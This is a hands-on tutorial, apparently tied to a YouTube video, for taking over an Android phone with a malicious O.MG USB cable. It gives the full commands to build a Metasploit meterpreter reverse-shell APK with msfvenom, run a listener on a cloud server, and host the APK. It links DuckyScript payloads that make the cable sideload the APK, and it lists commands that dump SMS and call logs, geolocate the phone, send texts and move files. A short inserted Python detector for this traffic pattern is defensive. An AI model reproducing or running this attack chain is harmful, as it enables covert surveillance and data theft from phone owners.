
Generate APK to put on O.MG Cable
Disclaimer

This document DOES NOT promote or encourage any illegal activities!


The content in this document is provided solely for educational purposes and to create
awareness!
Watch YouTube Video

This document is a companion to my YouTube video:


• https://youtu.be/Qb8Wvo9u5zE
Requirements

1. A Directional O.MG Cable (USB-C to USB-C).

[Figure: O.MG USB-C to USB-C cable, with the active end that deploys the payload labelled]

2. A Linode account.
3. An Android phone.
1. Generate APK to download using O.MG Cable

• Create your own virtual machine on Linode with a 60-day $100 credit: https://davidbombal.wiki/linode

• If that link doesn't work for you, try this link: https://www.linode.com/lp/youtube-viewers/?ifso=davidbombal

• Please note: Credits expire in 60 days. Big thanks to Linode for sponsoring my videos!

1. Log in to Linode.
2. Click on Create Linode.
3. Choose distribution Ubuntu 21.10 and your Region of choice.
4. You can use a Shared CPU – Nanode 1 GB is good enough for this demo.
5. Set the Linode Label to something that makes sense to you, and choose a password.
6. Click on Create Linode.
7. SSH into your Linode machine using your credentials.
8. Enter yes when asked if you are sure you want to continue connecting.
9. Enter your password for your Linode machine.
10. You are now ready to use your Ubuntu machine on Linode.
11. Enter the following command to download the Metasploit framework.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

Documentation with detailed instructions: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

12. Metasploit Framework is now installed in the /opt/metasploit-framework/bin/ directory.

13. Run the following commands:

cd /opt/metasploit-framework/bin
sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<linode_ip> LPORT=4444 -o /data/omg.apk

14. Run the following commands:

msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > run

15. Open a new terminal, SSH into the Linode Ubuntu machine, and run the following command:

python3 -m http.server 8000
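
From the defender's side, the delivery chain in steps 13 to 15 leaves a recognisable network trace: an .apk fetched over plain HTTP from an IP-literal URL, then a long-lived TCP session from the same client to the same address. The following is an added example, not part of the original document, that correlates those two events; the log format, the function name and every sample record are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed proxy/flow records in a hypothetical format:
#   "<epoch> <client_ip> HTTP <request> <status>"
#   "<epoch> <client_ip> FLOW tcp <dst_ip>:<dst_port> duration=<seconds>"
SAMPLE_LOG = """\
1700000000 10.0.5.23 HTTP GET http://203.0.113.10:8000/omg.apk 200
1700000004 10.0.5.23 FLOW tcp 203.0.113.10:4444 duration=1800
1700000100 10.0.5.40 HTTP GET http://updates.example.com/app.apk 200
1700000200 10.0.5.41 FLOW tcp 198.51.100.7:443 duration=12
1700000300 10.0.5.42 HTTP GET http://198.51.100.9:8000/tool.apk 200
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
APK_FROM_IP = re.compile(rf"GET http://({IPV4})(?::\d+)?/\S*\.apk\b", re.I)
FLOW = re.compile(rf"tcp ({IPV4}):(\d+) duration=(\d+)")


def find_sideload_chains(log_text, window=300, min_duration=60):
    """Return alerts where a client fetched an .apk from an IP-literal URL
    and, within `window` seconds, held a TCP session of at least
    `min_duration` seconds to that same IP. Assumes time-ordered records."""
    downloads = defaultdict(list)  # (client, server_ip) -> download timestamps
    alerts = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4:
            continue
        ts, client, kind, detail = int(parts[0]), parts[1], parts[2], parts[3]
        if kind == "HTTP":
            m = APK_FROM_IP.search(detail)
            if m:
                downloads[(client, m.group(1))].append(ts)
        elif kind == "FLOW":
            m = FLOW.search(detail)
            if not m:
                continue
            server, port, duration = m.group(1), int(m.group(2)), int(m.group(3))
            for t0 in downloads.get((client, server), []):
                if 0 <= ts - t0 <= window and duration >= min_duration:
                    alerts.append({"client": client, "server": server,
                                   "port": port, "delay_s": ts - t0})
    return alerts


if __name__ == "__main__":
    for alert in find_sideload_chains(SAMPLE_LOG):
        print(alert)
```

The rule keys on behaviour (IP-literal APK download plus a follow-on session) rather than on port 4444 or 8000, which are only the values this walkthrough happens to use.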
2. Load O.MG Cable Payload

O.MG Specific Steps

1. Make sure your O.MG Cable is plugged into a device. Connect to the O.MG Cable WiFi.
2. In your browser open http://192.168.4.1
3. Get the payload for either Android 10 or Android 11 from the following page:
• Android 10 and 11: https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android/meterpreter
• Android 9 (Samsung Galaxy S8+ - with only Chrome browser): https://github.com/davidbombal/hak5/blob/main/omg_android9SGS8_meterpreter
• Android 12 (Samsung Galaxy S22 Ultra – using Chrome browser as default): https://github.com/davidbombal/hak5/blob/0cbefc353e61cee8d7519d2ab986fad96bcd7aba/omg_androidS22Ultra.txt
4. Copy the payload into the DuckyPayload area. You may need to edit the script to work for different vendor-specific versions of Android.
5. Update the IP address and port number to that of your Kali / Cloud server.
6. Put the O.MG Cable payload side in the Android phone's USB-C port.
7. In the browser with the DuckyScript Payload Area open, click RUN.
3. Once Reverse Shell is Established -> Meterpreter

1. Once the reverse shell has been established you will see meterpreter > on your screen.
2. You can use the following commands on the Android device:
• pwd – Prints the current working directory on the phone.
• ifconfig – Shows all the network interfaces on the phone.
• ps – Shows the current processes that the Android operating system is running.
• sysinfo – Shows basic information about the Android device.
• send_sms -d "<phone_number>" -t "<text_content>"
• geolocate – Gets the GPS coordinates for the Android phone.
• dump_sms – Extracts all SMS messages and saves them as a text file.
• dump_calllog – Gets the call log.
• upload – Allows you to upload a file to the Android device remotely.
• download – Allows you to download files from the Android device remotely.
• wlan_geolocate – Gets the current lat-long using WLAN information.
• getuid – Displays the user that the Meterpreter server is running as on the host.

Requires that the Android phone has a SIM card from a service provider.
Optional Extras (MSFVenom – Payload Explanation)

MSFVenom payload breakdown


sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<ip_address> LPORT=4444 -o /data/omg.apk

• -p is the payload to use, in this case android/meterpreter_reverse_tcp.
• LHOST is the local (listening) host: the server IP that receives the connection back.
• LPORT is the local (listening) port on the server that the victim device connects back to.
• -o is for out: where the payload is saved.
Sign APK – Additional Steps (Unnecessary)

• Update Linux instance by running the following commands:

sudo apt update
sudo apt install openjdk-17-jdk

• Sign APK – Run the following commands:

sudo keytool -genkey -v -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore omg.apk hacked

• Install Zipalign

sudo apt install zipalign

• Align the .apk by using zipalign

sudo zipalign -v 4 omg.apk signed_omg.apk


Get more information

1. Website: https://www.youtube.com/davidbombal
2. Website: https://hak5.org/
3. Website: https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android/meterpreter
4. Website: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

We would like to acknowledge the following people:
• int0x80
• @_MG_
• Drewsec (https://www.youtube.com/channel/UCBWVaokY_7yCpVn-X0Ny9aA/)
